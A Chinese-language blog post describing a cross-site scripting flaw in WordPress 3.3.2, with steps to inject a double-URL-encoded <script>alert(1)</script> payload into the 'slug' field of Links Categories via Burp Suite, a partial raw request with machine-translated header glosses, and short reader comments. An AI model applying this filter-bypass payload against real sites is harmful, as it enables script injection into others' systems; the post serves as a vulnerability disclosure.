首页 > 新闻资讯 > WordPress 3.3.2跨站点脚本攻击

WordPress 3.3.2跨站点脚本攻击

8条评论
标签:
更多

wordpress版本3.3.2经常遭受到XSS(跨站脚本攻击)的漏洞攻击。然而,该攻击性不是非常严重。详情如下: 

a)登录管理员账号

b)  进入Links -> Links Categories菜单

c) 填写必要详情信息,拦截BURP suite请求。

d) 注入参数为slug。如果您在参数“slug”中注入<script>alert(1)</script> 值, 应用程序就会去除该攻击,数值变成alert1。如果有效负荷是双重编码,<script>alert(1)</script> 转化为%253cscript%253ealert%25281%2529%253c%252fscript%253e 旁路xss

保护。以下请求将显示raw burp请求、易受攻击参数和粗体标记的有效负荷。

BURP请求

POST /wordpress/wp-admin/edit-tags.php HTTP/1.1

Host: localhost 主机:本地主机

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0

Accept: 接受text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive 代理连接:

Referer: 引用站点 

* 版权声明:作者WordPress啦! 转载请注明出处。

#1
这是应对方法吗?能写得详细些吗?
#2
好久没过来这里看wordpress的最新动向了。
#3
这个安全性很重要!
#4
完全不懂啊
#5
完全不懂啊
#6
没看懂多少,杯具的